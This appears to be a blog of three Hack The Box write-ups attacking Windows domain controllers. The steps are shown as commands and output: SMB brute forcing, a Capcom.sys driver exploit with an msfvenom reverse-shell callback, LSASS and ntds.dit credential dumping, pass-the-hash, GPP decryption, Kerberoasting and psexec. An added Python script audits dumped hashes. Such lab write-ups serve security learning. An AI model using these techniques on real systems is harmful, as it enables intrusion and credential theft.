Ikonw

HTB Fuse Writeup


Author: Ikonw

nmap

# Nmap 7.80 scan initiated Wed Sep  2 03:57:19 2020 as: nmap -Pn -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49675,49676,49680,49698 -oN nmap/Full_10.10.10.193.nmap 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.0079s latency).

PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-02 08:10:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/2%Time=5F4F506B%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m00s, deviation: 4h02m32s, median: 12m58s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-09-02T01:12:45-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-02T08:12:42
|_ start_date: 2020-09-02T08:04:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 2 04:01:52 2020 -- 1 IP address (1 host up) scanned in 273.40 seconds

We get the FQDN from the smb-os-discovery script.

Add it to /etc/hosts.

I like to enumerate the SMB ports first:

┌──(root💀kali)-[~]
└─# enum4linux Fuse.fabricorp.local
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 7 11:02:19 2020

However, it didn't give me any critical information, and anonymous login didn't get me anything either:

┌──(root💀kali)-[~]
└─# smbclient -L 10.10.10.193
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

Start investigating the web server; it's a PaperCut CMS if I'm not wrong.

Found some users in the print logs:


We collect all the users:

pmerton
tlavel
sthompson
bhult
administrator

Based on previous boxes such as Sauna, the entry point is most likely to collect usernames and passwords from the web server and brute force the SMB ports.

Therefore we use cewl to build a password dictionary:

cewl -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm -m3 --with-numbers

Launch msfconsole and use the smb_login module to brute force:

msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE user
USER_FILE => user
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE wordlist
PASS_FILE => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > set smbdomain fabricorp.local
smbdomain => fabricorp.local
msf5 auxiliary(scanner/smb/smb_login) > run

Successfully got 2 creds:

[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'fabricorp.local\tlavel:Fabricorp01'
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: 'fabricorp.local\bhult:Fabricorp01'

Trying to log in to the SMB server, I was prompted with an error I had never met before. Both accounts have the same problem:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

After some googling, I found out I can use smbpasswd to change the password.

There seems to be some password policy, so I changed the password to Fabricop011 for both accounts:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.

After some enumeration with rpcclient, I found some usernames and the password $fab@s3Rv1ce$1. First the usernames:

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

and one password:

rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]

and we try to log in to Windows using these credentials.

Going back to msfconsole, we launch the WinRM login module to brute force the usernames against the password,

and we get the creds svc-print:$fab@s3Rv1ce$1.

Use evil-winrm to log in:

┌──(root💀kali)-[/opt/evil-winrm]
└─# ./evil-winrm.rb -i 10.10.10.193 -u svc-print -p \$fab@s3Rv1ce\$1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> dir
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> dir


Directory: C:\Users\svc-print


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/1/2020 1:45 AM Desktop
d-r--- 5/31/2020 5:20 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos


*Evil-WinRM* PS C:\Users\svc-print> cd Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir


Directory: C:\Users\svc-print\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/7/2020 12:35 AM 34 user.txt

Root

Now check the user's privileges:

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeLoadDriverPrivilege is enabled.

Abusing SeLoadDriverPrivilege for privilege escalation

This site is a good reference for SeLoadDriverPrivilege escalation:

EopLoaddriver

Capcom.sys

ExploitCapcom

Open the ExploitCapcom.cpp file and modify the LaunchShell function: change the commandLine[] target to meterpreter.exe and compile it.

Next we have to generate meterpreter.exe:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=1234 -f exe > meterpreter.exe

Create a folder called temp in C:\ and upload all 4 files to the target server:

*Evil-WinRM* PS C:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c000010e, WinError: 0
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000002841CC20008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

And we get the meterpreter session on our multi/handler.




HTB BlackField Writeup


Author: Ikonw

Nmap Scan:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 20:09 +08
Nmap scan report for 10.10.10.192
Host is up (0.0074s latency).

PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-07 19:09:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp filtered netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-07T19:09:47
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.59 seconds


Launch smbmap with the anonymous account; found 2 shares we can read:

┌──(root💀kali)-[/opt/nmapAutomator]
└─# smbmap -H 10.10.10.192 -u anonymous
[+] Guest session IP: 10.10.10.192:445 Name: 10.10.10.192
Disk       Permissions  Comment
----       -----------  -------
ADMIN$     NO ACCESS    Remote Admin
C$         NO ACCESS    Default share
forensic   NO ACCESS    Forensic / Audit share.
IPC$       READ ONLY    Remote IPC
NETLOGON   NO ACCESS    Logon server share
profiles$  READ ONLY
SYSVOL     NO ACCESS    Logon server share

Access to profiles$

We found tons of usernames; with smbclient piped through awk we collect them into a list:

smbclient \\\\10.10.10.192\\profiles$ -c ls | awk '{print $1}' > user.lst

Launch the impacket tool GetNPUsers.py:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.local/ -no-pass -usersfile user.lst | grep -v "not found"
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:d3f58a3eb5d36dc74f2c4a4335a5ce3e$06ce4ccf78e620d6e2e9994bd546f519cabec98dd1879365456bcee2081d7f0579d8e6b20d7b0e5750c533de72b48404ad38bf2241acc01cdf9e1868717cb01142ab131ebda7de2a0916a141ba5b1fd1b8e0895833ea57ce4b01cd93900eba7c4bab1e1a8dfcdb471486fedc1f731b5e65f38219e37883274350288d916e18f43359a170dd9aa3ef22d53c399378ed3467467211d6be448ee73983abe6cf7998725bfa70b7de45969715c15417af5249ebe9dd16332222f17101bbb1bdbfc2d32ac2bc319302911973a88a2b67fd425092e0f31329d04fd9eca106a97f2265185f6ae6c8ca8e747272dcad410bfbedac0275ed12
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

Save the hash and use john to crack it.

We get the creds support:#00^BlackKnight.

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:16 DONE (2020-09-07 21:30) 0.06203g/s 889266p/s 889266c/s 889266C/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Tried logging in via the WinRM port, but it failed.

Let's go back to the SMB server with the new credentials:

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# smbmap -H 10.10.10.192 -u support -p "#00^BlackKnight"
[+] IP: 10.10.10.192:445 Name: BLACKFIELD.local
Disk       Permissions  Comment
----       -----------  -------
ADMIN$     NO ACCESS    Remote Admin
C$         NO ACCESS    Default share
forensic   NO ACCESS    Forensic / Audit share.
IPC$       READ ONLY    Remote IPC
NETLOGON   READ ONLY    Logon server share
profiles$  READ ONLY
SYSVOL     READ ONLY    Logon server share

Found nothing interesting.

Use rpcclient to connect to RPC:

rpcclient -U blackfield.local\\support 10.10.10.192
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
...........................

We get tons of users again.

After some research, nothing special, but I came across an article on using RPC to reset a domain user's password:

Reset AD User password with Linux

Change user audit2020's password to Ikonw123!:

rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 Ikonw123!

Sadly, we are still not able to log in using WinRM, but we can access the SMB shares as audit2020.

Yeah, SMB shares again.

This time round, the forensic share is available to us:

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbmap -H 10.10.10.192 -u audit2020 -p Ikonw123!
[+] IP: 10.10.10.192:445 Name: BLACKFIELD.local
Disk       Permissions  Comment
----       -----------  -------
ADMIN$     NO ACCESS    Remote Admin
C$         NO ACCESS    Default share
forensic   READ ONLY    Forensic / Audit share.
IPC$       READ ONLY    Remote IPC
NETLOGON   READ ONLY    Logon server share
profiles$  READ ONLY
SYSVOL     READ ONLY    Logon server share

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbclient \\\\10.10.10.192\\forensic -U audit2020
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 21:03:16 2020
.. D 0 Sun Feb 23 21:03:16 2020
commands_output D 0 Mon Feb 24 02:14:37 2020
memory_analysis D 0 Fri May 29 04:28:33 2020
tools D 0 Sun Feb 23 21:39:08 2020

7846143 blocks of size 4096. 3978511 blocks available
smb: \>

Alright, there seem to be tons of files. Download the folder locally (if your internet connection is slow, you might also consider just mounting the SMB share locally):

recurse ON
prompt OFF
mget *

A DMP file is a file that contains data “dumped” from a program’s memory space. It is often created when a program has an error or crashes and may also be saved by the program “Savedump.exe” on the first reboot after a crash. DMP files are usually named “Memory.dmp.”

pypykatz can parse the secrets held in the LSASS process; it is similar to mimikatz's sekurlsa::

pypykatz lsa minidump lsass.DMP

and we actually get the password hash for user svc_backup:

== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c

No need to brute force; we can pass the hash directly using evil-winrm:

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap/memory_analysis]
└─# evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Privilege escalation

After checking the user's privileges, I found that SeBackupPrivilege is enabled.

SeBackupPrivilege
Description: This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file.

First, I tried vssadmin; well, I don't have the privilege:

*Evil-WinRM* PS C:\Users> vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Error: You don't have the correct permissions to run this command. Please run this utility from a command
window that has elevated administrator privileges.

"Members of "Backup Operators" can logon locally on a Domain Controller and backup the NTDS.DIT, for ex. with: "wbadmin.exe" or "diskshadow.exe""

Reading carefully, I found that diskshadow allows us to create a new shadow copy of the C: disk and expose it as another drive:

shadow_copy.txt

set context persistent nowriters
add volume c: alias ikonw
create
expose %ikonw% z:

However, it errors:

-> set context persistent nowriter  <<--- shouldn't it be nowriters?

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

CLIENTACCESSIBLE Specify to create shadow copies usable by client versions of Windows.
PERSISTENT Specify that shadow copy is persist across program exit, reset or reboot.
PERSISTENT NOWRITERS Specify that shadow copy is persistent and all writers are excluded.
VOLATILE Specify that shadow copy will be deleted on exit or reset.
VOLATILE NOWRITERS Specify that shadow copy is volatile and all writers are excluded.

Example: SET CONTEXT CLIENTACCESSIBLE

Add an extra character at the end of each line:

set context persistent nowriterss
add volume c: alias ikonww
createe
expose %ikonw% z::

However, one more error!!

The .cab metadata file cannot be stored in the current working directory, because it is read-only.

Ermmm, maybe because I am in the Documents directory.

Create a temp folder at C:\temp.

Finally, we successfully create the shadow copy on the Z: drive:

*Evil-WinRM* PS C:\temp> diskshadow /s shadow_copy.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/8/2020 5:40:45 AM

-> set context persistent nowriters
-> add volume c: alias ikonw
-> create
Alias ikonw for shadow ID {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81} set as environment variable.

Querying all shadow copies with the shadow copy set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81}

* Shadow copy ID = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922} %ikonw%
- Shadow copy set: {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/8/2020 5:40:45 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %ikonw% z:
-> %ikonw% = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922}
The shadow copy was successfully exposed as z:\.
->


The folder permissions on the Z: shadow drive are also inherited from C:, so we don't have permission to download the files.

After looking at the GitHub page:

  • If you want to read/copy data out of a “normally forbidden” folder, you have to act as a backup software. The shell copy command won’t work; you’ll need to open the source file manually using CreateFile making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

SeBackupPrivilegeCmdLets.dll

SeBackupPrivilegeUtils.dll

*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> cd z:\windows\ntds
*Evil-WinRM* PS z:\windows\ntds> Copy-FileSeBackupPrivilege ntds.dit c:\temp\ntds.dit
*Evil-WinRM* PS z:\windows\ntds> cd c:\temp
*Evil-WinRM* PS C:\temp> dir


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/8/2020 5:40 AM 617 2020-09-08_5-40-45_DC01.cab
-a---- 9/8/2020 5:52 AM 18874368 ntds.dit
-a---- 9/8/2020 5:50 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 9/8/2020 5:51 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 9/8/2020 5:40 AM 88 shadow_copy.txt

and we get the ntds.dit file. Download it to Kali,

and use secretsdump. I just realized it still needs an extra SYSTEM hive file, saved on the target first:

reg save HKLM\SYSTEM c:\temp\system.hive

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -outputfile hash | more
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

and we get the Administrator hash; use evil-winrm to log in and we have root!
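A dump like the one above is also what a defender reviews after an incident or a password audit. The following is an added example, not code from the original post: it parses secretsdump's `domain\uid:rid:lmhash:nthash:::` lines and flags the three things worth acting on first: accounts with an empty NT hash (blank password), accounts whose LM hash is still stored, and distinct accounts that share one NT hash (password reuse). The first six sample lines are the ones shown above; the `svc_legacy` and `helpdesk` lines are constructed (using the well-known LM/NT hashes of the string "password") purely to exercise the other two checks.

```python
import re
from collections import defaultdict

# Sample in secretsdump's "domain\uid:rid:lmhash:nthash:::" format.
# First six lines: as shown in the writeup. Last two: constructed for this
# example only, to trigger the LM-hash and hash-reuse findings.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
svc_legacy:1200:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
helpdesk:1201:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (LM disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string (blank password)

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text):
    """Return (user, rid, lm, nt) tuples; lines that are not hash records are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def audit(entries):
    """Flag blank passwords, stored LM hashes, and NT hashes shared by several accounts.

    Note: this format carries no account status, so a flagged account
    (e.g. Guest) may already be disabled; check that separately in AD.
    """
    findings = {"blank_password": [], "lm_hash_present": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in entries:
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)
        if lm != EMPTY_LM:
            findings["lm_hash_present"].append(user)
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if len(users) > 1:
            findings["shared_nt_hash"][nt] = users
    return findings


if __name__ == "__main__":
    for name, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{name}: {value}")
```

Run it against a real `-outputfile` result from secretsdump to get the same three lists; the regex deliberately requires the `:::` suffix so history entries and Kerberos keys in the same file are ignored.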




HTB Active Writeup

Attack box: official Kali Linux 2019 64-bit
Author: Ikonw

Target overview

1. Port scanning

Here I used a script tool I used back in my OSCP days (lazy):

nmapAutomator

./nmapAutomator.sh 10.10.10.100 Full

Apart from 53 and 445 there are no ports that are especially interactive.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-10 18:56 +08
Nmap scan report for 10.10.10.100
Host is up (0.23s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-10 10:57:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 38s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-10T10:58:25
|_ start_date: 2020-02-10T08:17:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.25 seconds


2. SMB enumeration

First, use smbmap to determine the anonymous user's permissions (if there is write access, impacket can be used to get a shell directly):

smbmap -H 10.10.10.100

We have READ ONLY permission on the Replication folder.
(I originally wanted to mount the SMB share with mount, but it failed. If anyone succeeded, let me know in the comments.)

Connect to Replication with smbclient:

smbclient \\\\10.10.10.100\\Replication

Two interesting folders are found:

31B2F340-016D-11D2-945F-00C04FB984F9 is the Default admin policy
6AC1786C-016F-11D2-945F-00C04fB984F9 is the Default domain policies

If I remember correctly, Windows Server versions below 2012 store passwords in the GPO.
After some searching:
smb: \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups

Groups.xml is found in this directory.

An account and a password hash are found:

Account: active.htb\SVC_TGS
Hash: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

The password can be decrypted with gpp-decrypt, which ships with Kali:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

We get the password GPPstillStandingStrong2k18.
Now that we have a new account, use smbmap to confirm whether we have write permission (to get a shell):

smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18

We have read permission on the files in the Users directory,
so smbclient can be used to go in and grab user.txt.

3. ROOT

Earlier we saw Kerberos running on port 88. Let's try a Kerberoasting attack.

Kerberoasting attack

Use impacket-GetUserSPNs:

/usr/bin/impacket-GetUserSPNs -request active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100

After getting the hash, crack it with John the Ripper.
The Administrator password is Ticketmaster1968.

With the account and password, we can log in using impacket's psexec:

/usr/share/doc/python3-impacket/examples/psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100

Success, we have Administrator.




